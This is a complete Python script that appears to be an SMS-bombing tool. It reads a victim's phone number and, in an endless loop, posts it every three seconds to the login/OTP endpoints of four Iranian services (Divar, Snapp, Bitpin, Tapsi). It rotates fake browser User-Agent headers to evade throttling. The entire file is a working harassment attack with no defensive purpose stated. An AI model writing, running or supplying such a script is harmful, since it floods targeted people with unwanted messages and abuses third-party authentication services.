import requests
import random
import time

number=input("ALI JOON Enter Number (bedon 0):")
url_divar="https://api.divar.ir/v5/auth/authenticate"
json_divar={"phone":number}
url_snapp="https://app.snapp.taxi/api/api-passenger-oauth/v2/otp" 
json_snapp={"cellphone":number}
url_bitpin="https://api.bitpin.ir/v1/usr/sub_phone/"
json_bitpin={"phone":number}
url_tapsi="https://api.tapsi.cab/api/v2.2/user"
json_tapsi={"phone":number}
heads =[
{
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0','Accept':'*/*'
},
{
    'User-Agent':'Mozilla/5.0 (Windows NT 3.1; rv:109.0) Gecko/20100101 Firefox/69.0','Accept':'*/*'
},
{
    'User-Agent':'Mozilla/5.0 (X11; Debian; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0','Accept':'*/*'
},
{
    'User-Agent':'Mozilla/5.0 (X11; Debian; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0','Accept':'*/*'
},
{
    'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0','Accept':'*/*'
},
{
    'User-Agent':'Mozilla/5.0 (Windows NT 6.1; rv:109.0) Gecko/20100101 Firefox/69.0','Accept':'*/*'
},
]
while True:
    random_head = random.choice(heads)

    req=requests.post(url=url_divar,json=json_divar,headers=random_head)
    print(req)

    req=requests.post(url=url_snapp,json=json_snapp,headers=random_head)
    print(req)

    req=requests.post(url=url_bitpin,json=json_bitpin,headers=random_head)
    print(req)

    req=requests.post(url=url_tapsi,json=json_tapsi,headers=random_head)
    print(req)
    time.sleep(3)

